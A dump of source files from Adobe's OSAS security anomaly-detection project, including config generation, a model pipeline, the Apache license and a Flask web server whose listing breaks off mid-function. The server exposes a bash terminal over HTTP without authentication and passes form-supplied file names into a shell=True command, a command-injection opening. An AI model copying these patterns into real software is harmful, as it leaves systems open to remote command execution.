147 | * Boros, Tiberiu, Andrei Cotaie, Kumar Vikramjeet, Vivek Malik, Lauren Park, and Nick Pachis. ‘A Principled Approach to Enriching Security-Related Data for Running Processes through Statistics and Natural Language Processing’. In IoTBDS 2021 - 6th International Conference on Internet of Things, Big Data and Security, 2021.
148 |
149 | **BibTeX**
150 |
151 | ```text
152 | @article{boros2021principled,
153 | title={A Principled Approach to Enriching Security-related Data for Running Processes through Statistics and Natural Language Processing},
154 | author={Boros, Tiberiu and Cotaie, Andrei and Vikramjeet, Kumar and Malik, Vivek and Park, Lauren and Pachis, Nick},
155 | year={2021},
156 | booktitle={IoTBDS 2021 - 6th International Conference on Internet of Things, Big Data and Security}
157 | }
158 | ```
--------------------------------------------------------------------------------
/src/osas/main/autoconfig.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import optparse
20 | import sys
21 | import inspect
22 |
23 | sys.path.append('')
24 | from osas.data.datasources import CSVDataSource
25 | from osas.core import label_generators
26 |
27 |
28 | def _get_type(val):
29 | try:
30 | x = int(val)
31 | return 'int'
32 | except:
33 | try:
34 | x = float(val)
35 | return 'float'
36 | except:
37 | if val is None:
38 | return 'none'
39 | else:
40 | return 'str'
41 |
42 |
43 | def _detect_field_type(datasource, count_column=None):
44 | item = datasource[0]
45 | field_type = {key: 'int' for key in item}
46 | sys.stdout.write('\n')
47 | sys.stdout.flush()
48 |
49 | if count_column is None:
50 | count = len(datasource)
51 | else:
52 | count = 0
53 |
54 | for item in datasource:
55 | if count_column is not None:
56 | count += item[count_column]
57 | for key in item:
58 | t = _get_type(item[key])
59 | if t == 'float':
60 | if field_type[key] == 'int':
61 | field_type[key] = t
62 | elif t == 'str':
63 | field_type[key] = t
64 |
65 | field2val = {}
66 | for item in datasource:
67 | for key in field_type:
68 | if field_type[key] == 'str' or field_type[key] == 'int' or field_type[key] == 'float':
69 | value = item[key]
70 | if key not in field2val:
71 | field2val[key] = {}
72 | if (len(field2val[key]) - 1) / count < 0.1:
73 | if value not in field2val[key]:
74 | field2val[key][value] = '1'
75 | for key in field2val:
76 | if len(field2val[key]) / count < 0.1:
77 | field_type[key] = 'multinomial'
78 | elif field_type[key] == 'str':
79 | field_type[key] = 'text'
80 |
81 | return field_type
82 |
83 |
84 | def _get_generators(datasource: CSVDataSource, field_types: dict):
85 | generator_list = []
86 | for key in field_types:
87 | if field_types[key] == 'int' or field_types[key] == 'float':
88 | generator_list.append(['NumericField', [key]])
89 | if field_types[key] == 'multinomial':
90 | generator_list.append(['MultinomialField', [key]])
91 | if field_types[key] == 'text':
92 | generator_list.append(['TextField', [key]])
93 | assigned = {}
94 | for key1 in field_types:
95 | for key2 in field_types:
96 | if field_types[key1] == 'multinomial' and field_types[key2] == 'multinomial' and \
97 | (key2, key1) not in assigned and key1 != key2:
98 | generator_list.append(['MultinomialFieldCombiner', [key1, key2]])
99 | assigned[(key1, key2)] = '1'
100 |
101 | generator_list = list(sorted(generator_list, key=lambda x: x[0]))
102 |
103 | return generator_list
104 |
105 |
106 | HEADER = """; OSAS autogenerated configuration file
107 | ;
108 | ; Below we provide a list of standard label generator templates - feel free to copy-paste and edit them
109 | ; in order to cope with your own dataset
110 | ;
111 |
112 | ; [LG_MULTINOMIAL]
113 | ; generator_type = MultinomialField
114 | ; field_name =
115 | ; absolute_threshold = 10
116 | ; relative_threshold = 0.1
117 |
118 | ; [LG_TEXT]
119 | ; generator_type = TextField
120 | ; field_name =
121 | ; lm_mode = char
122 | ; ngram_range = (3, 5)
123 |
124 | ; [LG_NUMERIC]
125 | ; generator_type = NumericField
126 | ; field_name =
127 | ; label_for_normal = False
128 | ; stdev = True
129 | ; stdev_borderline_threshold = 1
130 | ; stdev_outlier_threshold = 2
131 | ; spike = none # one of 'none', 'ratio', or 'fixed'
132 | ; spike_borderline_threshold = 10
133 | ; spike_outlier_threshold = 20
134 |
135 | ; [LG_MUTLINOMIAL_COMBINER]
136 | ; generator_type = MultinomialFieldCombiner
137 | ; field_names = ['', '', ...]
138 | ; absolute_threshold = 10
139 | ; relative_threshold = 0.1
140 |
141 | ; [LG_KEYWORD]
142 | ; generator_type = KeywordBased
143 | ; field_name =
144 | ; keyword_list = ['', '', '', ...]
145 |
146 | ; [LG_REGEX]
147 | ; generator_type = KnowledgeBased
148 | ; field_name =
149 | ; rules_and_labels_tuple_list = [('',''), ('',''), ...]"""
150 |
151 |
152 | def _write_conf(generators, filename, count_column=None):
153 | f = open(filename, 'w')
154 | f.write(HEADER)
155 | f.write('\n\n')
156 | if params.count_column:
157 | f.write('[GENERAL]\n')
158 | f.write('count_column={0}\n\n'.format(count_column))
159 | count = 0
160 | for generator in generators:
161 | count += 1
162 | f.write('[LG_{0}]\n'.format(count))
163 | f.write('generator_type = {0}\n'.format(generator[0]))
164 | dyn_class = getattr(sys.modules[label_generators.__name__], generator[0])
165 |
166 | signature = inspect.signature(dyn_class.__init__)
167 | for param in signature.parameters.items():
168 | param_name = param[1].name
169 | param_value = param[1].default
170 | if param_name == 'self':
171 | continue
172 | if param_name == 'field_name' or param_name == 'field_names':
173 | if len(generator[1]) == 1:
174 | param_value = generator[1][0]
175 | else:
176 | param_value = generator[1]
177 | f.write('{0} = {1}\n'.format(param_name, param_value))
178 | f.write('\n')
179 | f.write('[AnomalyScoring]\nscoring_algorithm = StatisticalNGramAnomaly\n')
180 | f.close()
181 |
182 |
183 | def process(params):
184 | datasource = CSVDataSource(params.input_file)
185 | sys.stdout.write('Preprocessing')
186 | if params.count_column:
187 | cc = params.count_column
188 | else:
189 | cc = None
190 | field_type = _detect_field_type(datasource, count_column=cc)
191 | sys.stdout.write('\t::Detected field types:\n')
192 | for key in field_type:
193 | sys.stdout.write('\t\t"{0}": {1}\n'.format(key, field_type[key]))
194 |
195 | generators = _get_generators(datasource, field_type)
196 | sys.stdout.write('\t::Suggested generators:\n')
197 | for item in generators:
198 | sys.stdout.write('\t\t{0}: {1}\n'.format(item[0], item[1]))
199 |
200 | _write_conf(generators, params.output_file, count_column=params.count_column)
201 |
202 |
203 | if __name__ == '__main__':
204 | parser = optparse.OptionParser()
205 | parser.add_option('--input-file', action='store', dest='input_file', help='location of the input file')
206 | parser.add_option('--output-file', action='store', dest='output_file', help='location of the output file')
207 | parser.add_option('--count-column', action='store', dest='count_column',
208 | help='if this value is set, OSAS will consider the data clustered and this column will indicate'
209 | 'the number of occurrences of the event. Otherwise, this number is considered equal to 1')
210 | (params, _) = parser.parse_args(sys.argv)
211 |
212 | if params.input_file and params.output_file:
213 | process(params)
214 | else:
215 | parser.print_help()
216 |
--------------------------------------------------------------------------------
/src/osas/pipeline/pipeline.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import configparser
20 | import os
21 | import sys
22 | from ast import literal_eval
23 |
24 | sys.path.append('')
25 | from src.osas.pipeline import GroomData
26 | from osas.data.datasources import CSVDataSource, Datasource
27 | from src.osas.pipeline import DetectAnomalies
28 | import json
29 |
30 |
31 | class Pipeline:
32 | ''' base class contains all template methods '''
33 | env = None
34 | root_dir = None
35 | config = None
36 |
37 | def __init__(self, env):
38 | '''
39 | init args
40 | - obj
41 | - env var
42 | '''
43 | # global vars set as env vars
44 | Pipeline.env = env
45 | os.environ["OSAS_ENV"] = env # PROD/STAGE/DEV
46 | curr_dir = os.path.dirname(os.path.realpath(__file__))
47 | Pipeline.root_dir = os.path.realpath(os.path.join(curr_dir, "../"))
48 | self._pipeline = []
49 | self._detect_anomalies = None
50 | self._count_column = None
51 |
52 | def load_config(self, config_file, env='DEV'):
53 | '''
54 | load configs
55 | args:
56 | - obj
57 | - configfile path
58 | - env
59 | '''
60 | with open(config_file, "r") as f:
61 | cfg = configparser.RawConfigParser()
62 | cfg.read_file(f)
63 | self.config = cfg
64 |
65 | self._scoring_model_name = self.config['AnomalyScoring']['scoring_algorithm']
66 |
67 | if 'GENERAL' in self.config:
68 | if 'count_column' in self.config['GENERAL']:
69 | self._count_column = self.config['GENERAL']['count_column']
70 |
71 | def load_model(self, model_file, env='DEV'):
72 | '''
73 | Loads a pretrained model for the current configuration
74 | :param model_file: json file where pretrained model was stored
75 | :param env: environment type
76 | :return: None
77 | '''
78 | pretrained = json.load(open(model_file))
79 | gd = GroomData()
80 | self._pipeline = []
81 | for sect in self.config:
82 | print('\t::{0}'.format(sect))
83 | if 'generator_type' in self.config[sect]:
84 | self._pipeline.append(gd.from_pretrained(self.config[sect]['generator_type'],
85 | pretrained['model'][sect]))
86 | da = DetectAnomalies()
87 | self._detect_anomalies = da.get_pretrained_model(self._scoring_model_name, json.dumps(pretrained['scoring']))
88 |
89 | def build_pipeline(self, dataset: Datasource, incremental=False) -> dict:
90 | '''
91 | Generates a JSON serializable object that contains data for all pretrained label generators
92 | :param dataset: dataset to train the model on
93 | :return: serializable dict object
94 | '''
95 | gd = GroomData()
96 | ex_pipeline = self._pipeline
97 | self._pipeline = []
98 | final_model = {'model': {}}
99 | index = 0
100 | for sect in self.config:
101 | print('\t::{0}'.format(sect))
102 | if 'generator_type' in self.config[sect]:
103 | for key in self.config[sect]:
104 | print("\t\t::{0} = {1}".format(key, self.config[sect][key]))
105 | if incremental:
106 | lg = ex_pipeline[index]
107 | else:
108 | lg = gd.label_generator(self.config[sect]['generator_type'], self.config[sect])
109 | index += 1
110 | print("\t\t::OBJECT: {0}".format(lg))
111 | sys.stdout.write('\t\t::BUILDING MODEL...')
112 | sys.stdout.flush()
113 | lg_model = gd.build_model(lg, dataset, count_column=self._count_column)
114 | final_model['model'][sect] = lg_model
115 | sys.stdout.write('done\n')
116 | self._pipeline.append(lg)
117 | # remove anomaly detection update (not all models support incremental because of sklearn dependencies)
118 | # if incremental:
119 | # final_model['scoring'] = self._detect_anomalies
120 | # return final_model
121 |
122 | self(dataset, dest_field_labels='_labels')
123 | da = DetectAnomalies()
124 | if not incremental:
125 | self._detect_anomalies = da.detection_model(self.config['AnomalyScoring']['scoring_algorithm'],
126 | load_config=False)
127 | # check for classifier scoring and if so, add grouth truth column and classifier as param
128 | if self.config['AnomalyScoring']['scoring_algorithm'] == 'SupervisedClassifierAnomaly':
129 | ground_truth_column = self.config['AnomalyScoring']['ground_truth_column']
130 | classifier = self.config['AnomalyScoring']['classifier']
131 | # grab function args for model init from rest of conf variables
132 | init_args = dict(self.config['AnomalyScoring'])
133 | del init_args['scoring_algorithm']
134 | del init_args['ground_truth_column']
135 | del init_args['classifier']
136 | # convert config values to inferred types, safely
137 | for k in init_args:
138 | try:
139 | init_args[k] = literal_eval(init_args[k])
140 | except:
141 | # it will be a string otherwise
142 | pass
143 | # build model
144 | scoring_model = self._detect_anomalies.build_model(dataset,
145 | ground_truth_column,
146 | classifier,
147 | init_args,
148 | incremental=incremental)
149 | else:
150 | scoring_model = self._detect_anomalies.build_model(dataset, incremental=incremental)
151 | final_model['scoring'] = scoring_model
152 | return final_model
153 |
154 | def __call__(self, dataset: Datasource, dest_field_labels='labels', dest_field_score='score'):
155 | all_labels = []
156 | for item in dataset:
157 | label_list = []
158 | for lg in self._pipeline:
159 | llist = lg(item)
160 | for label in llist:
161 | label_list.append(label)
162 | all_labels.append(label_list)
163 | dataset[dest_field_labels] = all_labels
164 | dataset['_labels'] = all_labels
165 | if self._detect_anomalies is not None:
166 | scores = self._detect_anomalies(dataset)
167 | dataset[dest_field_score] = scores
168 |
169 |
170 | if __name__ == '__main__':
171 | p = Pipeline('DEV')
172 | p.load_config('tests/pipeline_test.conf')
173 | import time
174 |
175 | ts1 = time.time()
176 | datasource = CSVDataSource('tests/test_small.csv')
177 | ts2 = time.time()
178 | pipeline_model = p.build_pipeline(datasource)
179 | ts3 = time.time()
180 | p(datasource)
181 | ts4 = time.time()
182 | json.dump(pipeline_model, open('tests/pipeline.json', 'w'), indent=4)
183 | for item in datasource[:10]:
184 | print(item)
185 | print()
186 | print()
187 |
188 | print(
189 | "Timing:\n\tLoad dataset: {0}\n\tBuild pipeline: {1}\n\tApply models:{2}\n\tDataset size: {3} entries\n".format(
190 | ts2 - ts1, ts3 - ts2, ts4 - ts3, len(datasource)))
191 |
192 | # load
193 | p = Pipeline('DEV')
194 | p.load_config('tests/pipeline_test.conf')
195 | p.load_model('tests/pipeline.json')
196 | p(datasource)
197 |
198 | for item in datasource[:10]:
199 | print(item)
200 | print()
201 | print()
202 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Apache License
2 | Version 2.0, January 2004
3 | http://www.apache.org/licenses/
4 |
5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6 |
7 | 1. Definitions.
8 |
9 | "License" shall mean the terms and conditions for use, reproduction,
10 | and distribution as defined by Sections 1 through 9 of this document.
11 |
12 | "Licensor" shall mean the copyright owner or entity authorized by
13 | the copyright owner that is granting the License.
14 |
15 | "Legal Entity" shall mean the union of the acting entity and all
16 | other entities that control, are controlled by, or are under common
17 | control with that entity. For the purposes of this definition,
18 | "control" means (i) the power, direct or indirect, to cause the
19 | direction or management of such entity, whether by contract or
20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
21 | outstanding shares, or (iii) beneficial ownership of such entity.
22 |
23 | "You" (or "Your") shall mean an individual or Legal Entity
24 | exercising permissions granted by this License.
25 |
26 | "Source" form shall mean the preferred form for making modifications,
27 | including but not limited to software source code, documentation
28 | source, and configuration files.
29 |
30 | "Object" form shall mean any form resulting from mechanical
31 | transformation or translation of a Source form, including but
32 | not limited to compiled object code, generated documentation,
33 | and conversions to other media types.
34 |
35 | "Work" shall mean the work of authorship, whether in Source or
36 | Object form, made available under the License, as indicated by a
37 | copyright notice that is included in or attached to the work
38 | (an example is provided in the Appendix below).
39 |
40 | "Derivative Works" shall mean any work, whether in Source or Object
41 | form, that is based on (or derived from) the Work and for which the
42 | editorial revisions, annotations, elaborations, or other modifications
43 | represent, as a whole, an original work of authorship. For the purposes
44 | of this License, Derivative Works shall not include works that remain
45 | separable from, or merely link (or bind by name) to the interfaces of,
46 | the Work and Derivative Works thereof.
47 |
48 | "Contribution" shall mean any work of authorship, including
49 | the original version of the Work and any modifications or additions
50 | to that Work or Derivative Works thereof, that is intentionally
51 | submitted to Licensor for inclusion in the Work by the copyright owner
52 | or by an individual or Legal Entity authorized to submit on behalf of
53 | the copyright owner. For the purposes of this definition, "submitted"
54 | means any form of electronic, verbal, or written communication sent
55 | to the Licensor or its representatives, including but not limited to
56 | communication on electronic mailing lists, source code control systems,
57 | and issue tracking systems that are managed by, or on behalf of, the
58 | Licensor for the purpose of discussing and improving the Work, but
59 | excluding communication that is conspicuously marked or otherwise
60 | designated in writing by the copyright owner as "Not a Contribution."
61 |
62 | "Contributor" shall mean Licensor and any individual or Legal Entity
63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "{}"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright {yyyy} {name of copyright owner}
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
202 |
--------------------------------------------------------------------------------
/src/osas/webserver.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | from flask import Flask
20 | from flask import Response
21 | from flask import request
22 | from flask import render_template, send_from_directory, send_file
23 | from os import listdir
24 | from os.path import isfile, join
25 | import subprocess
26 | import configparser
27 | import pty
28 | import os
29 | import threading
30 | import shlex
31 | import select
32 | import struct
33 | import termios
34 | import fcntl
35 |
36 | if os.path.isdir('/app'):
37 | data_path='/app/'
38 | else:
39 | data_path = 'tests/'
40 |
41 | app = Flask(__name__)
42 | pty_buffer = []
43 |
44 |
45 | @app.route('/', defaults={'path': ''})
46 | @app.route('/osas')
47 | def index():
48 | text = ''' OSAS server is running
49 | For console interaction, go to http://127.0.0.1:8888/osas/console and follow the steps
50 | For automated pipeline, go to http://127.0.0.1:8888/osas/run_full_process
51 | For custom pipeline, go to http://127.0.0.1:8888/osas/generate_config and follow the steps
52 | '''
53 | return text
54 |
55 |
56 | @app.route('/osas/static/')
57 | def assets(filename):
58 | # Add custom handling here.
59 | # Send a file download response.
60 | # print(path)
61 | print(filename)
62 | return send_file('templates/static/{0}'.format(filename))
63 |
64 |
65 | @app.route('/osas/console', methods=['GET', 'POST'])
66 | def console_print():
67 | return render_template("console.html")
68 |
69 |
70 | @app.route('/osas/console/read', methods=['GET', 'POST'])
71 | def console_read():
72 | global pty_buffer
73 | tmp = pty_buffer
74 | pty_buffer = []
75 |
76 | return ''.join([chr(c) for c in tmp])
77 |
78 |
79 | @app.route('/osas/console/size', methods=['GET', 'POST'])
80 | def console_size():
81 | xpix = 0
82 | ypix = 0
83 |
84 | global pty_fd
85 | data = request.json
86 | print(data)
87 | winsize = struct.pack("HHHH", data['row'], data['col'], xpix, ypix)
88 | fcntl.ioctl(pty_fd, termios.TIOCSWINSZ, winsize)
89 | return ''
90 |
91 |
92 | @app.route('/osas/console/write', methods=['GET', 'POST'])
93 | def console_write():
94 | data = request.json
95 | # print(data)
96 | global pty_fd
97 | data = data['asciiKey'].encode()
98 | # print(data)
99 | os.write(pty_fd, data)
100 |
101 | global pty_buffer
102 | tmp = pty_buffer
103 | pty_buffer = []
104 | # print("returning {0}".format(tmp))
105 | return ''.join([chr(c) for c in tmp])
106 |
107 |
108 | pty_fd = None
109 |
110 |
111 | def pty_read(f):
112 | global pty_fd
113 | pty_fd = f
114 |
115 | def rthread(fd):
116 | while (True):
117 | import time
118 | time.sleep(0.02)
119 | (data_ready, _, _) = select.select([fd], [], [], 0)
120 | if data_ready:
121 | global pty_buffer
122 | data = os.read(fd, 1024 * 1024)
123 | # print(str(data))
124 | pty_buffer += data # data.decode("utf-8")
125 |
126 | x = threading.Thread(target=rthread, args=(f,), daemon=True)
127 | x.start()
128 |
129 |
130 | # def pty_start():
131 | # pty.spawn("bash", pty_read)
132 | #
133 | #
134 | # x = threading.Thread(target=pty_start, args=(), daemon=True)
135 | # x.start()
136 |
137 | (child_pid, fd) = pty.fork()
138 | if child_pid == 0:
139 | # this is the child process fork.
140 | # anything printed here will show up in the pty, including the output
141 | # of this subprocess
142 | subprocess.run("bash")
143 | else:
144 | # this is the parent process fork.
145 | # store child fd and pid
146 | # app.config["fd"] = fd
147 | # app.config["child_pid"] = child_pid
148 | # set_winsize(fd, 50, 50)
149 | pty_fd = fd
150 | os.write(pty_fd, 'export TERM=xterm\n'.encode())
151 | cmd = " ".join(shlex.quote(c) for c in "bash")
152 | print("child pid is", child_pid)
153 | print(
154 | f"starting background task with command `{cmd}` to continously read "
155 | "and forward pty output to client"
156 | )
157 | # socketio.start_background_task(target=read_and_forward_pty_output)
158 | print("task started")
159 | print(pty_fd)
160 | pty_read(pty_fd)
161 |
162 |
163 | @app.route('/osas/generate_config', methods=['GET', 'POST'])
164 | def generate_config():
165 | print(request.method)
166 | if request.method == 'GET':
167 | onlyfiles = [f for f in listdir(data_path) if
168 | isfile(join(data_path, f)) and '.conf' not in f and 'pipeline' not in f and '.model' not in f]
169 | files = onlyfiles
170 |
171 | return render_template("generate_config.html", files=files, len=len(files))
172 |
173 | if request.method == 'POST':
174 | data = request.form.to_dict()
175 | # print(data)
176 | input = data['input']
177 | output = data['output']
178 | print(input)
179 | print(output)
180 | if '.conf' not in output:
181 | output += '.conf'
182 |
183 | def inner():
184 | proc = subprocess.Popen(['python3 osas/main/autoconfig.py --input-file={} --output-file={} 2>&1'.format(
185 | data_path + input, data_path + output)], shell=True, stdout=subprocess.PIPE)
186 |
187 | for line in iter(proc.stdout.readline, ''):
188 | try:
189 | yield line.rstrip().decode('ascii') + ' \n'
190 | except:
191 | a = None
192 | poll = proc.poll()
193 | if poll is not None:
194 | yield 'DONE! \n'
195 | full_text = """go to http://127.0.0.1:8888/osas/confirm_config
196 | """
201 | # yield 'go to http://127.0.0.1:8888/osas/confirm_config'
202 | yield full_text
203 | break
204 |
205 | #
206 | return Response(inner(), mimetype='text/html')
207 | # return request.data
208 |
209 |
210 | @app.route('/osas/confirm_config', methods=['GET', 'POST'])
211 | def confirm_config():
212 | config = configparser.ConfigParser()
213 | print(request.method)
214 |
215 | if request.method == 'GET':
216 | onlyfiles = [f for f in listdir(data_path) if
217 | isfile(join(data_path, f)) and '.conf' in f and 'pipeline' not in f]
218 | files = onlyfiles
219 | return render_template("config_manual_update.html", files=files, len=len(files))
220 |
221 | if request.method == 'POST':
222 | print(request.form)
223 | print('here')
224 | input = request.form['input']
225 | try:
226 | output = request.form['output']
227 | except:
228 | output = None
229 | try:
230 | text_box = request.form['text_box']
231 | except:
232 | text_box = None
233 |
234 | if output == None and text_box == None:
235 | files = [str(input)]
236 | config_data = 'data'
237 | config.read(data_path + input)
238 | # print(config.sections())
239 | config_obj = []
240 | for section in config.sections():
241 | elem = []
242 | if section == 'AnomalyScoring':
243 | a = 1
244 | else:
245 |
246 | elem.append(section)
247 | elem.append(config[section]['generator_type'])
248 | try:
249 | elem.append(config[section]['field_name'])
250 | except:
251 | elem.append(config[section]['field_names'])
252 |
253 | config_obj.append(elem)
254 |
255 | # print(config_obj)
256 | output = "tailored_" + input.replace('.conf', '')
257 | Anomaly_list = ['StatisticalNGramAnomaly', 'SVDAnomaly', 'LOFAnomaly', 'IFAnomaly', 'SupervisedClassifierAnomaly']
258 | return render_template("config_manual_update.html", files=files, len=len(files), config=config_data,
259 | input=input, config_obj=config_obj, len_config=len(config_obj),
260 | anomaly_alg=Anomaly_list, output=output)
261 |
262 | elif output != None:
263 | data = request.form.to_dict()
264 | output = data['output'] + '.conf'
265 | data.pop('output')
266 | input = data['input']
267 | data.pop('input')
268 | Anomaly = data['Anomaly']
269 | data.pop('Anomaly')
270 | ground_truth_column = data['ground-truth-column']
271 | data.pop('ground-truth-column')
272 | classifier = data['classifier']
273 | data.pop('classifier')
274 | model_args = data['model-args']
275 | data.pop('model-args')
276 | labels = list(data.keys())
277 | print(labels)
278 |
279 | config.read(data_path + input)
280 | new_config = configparser.ConfigParser()
281 | for label in labels:
282 | print(config[label])
283 | new_config[label] = config[label]
284 | new_config['AnomalyScoring'] = config['AnomalyScoring']
285 | new_config['AnomalyScoring']['scoring_algorithm'] = Anomaly
286 | if Anomaly == 'SupervisedClassifierAnomaly':
287 | new_config['AnomalyScoring']['ground_truth_column'] = ground_truth_column
288 | new_config['AnomalyScoring']['classifier'] = classifier
289 | model_args = model_args.split('\n')
290 | for model_arg in model_args:
291 | model_arg = model_arg.split('=')
292 | new_config['AnomalyScoring'][model_arg[0].strip()] = model_arg[1].strip()
293 | with open(data_path + output, 'w') as configfile:
294 | new_config.write(configfile)
295 | input_data = open('osas/templates/config_static.txt', 'r').read() + "\n\n" + open(data_path + output,
296 | 'r').read()
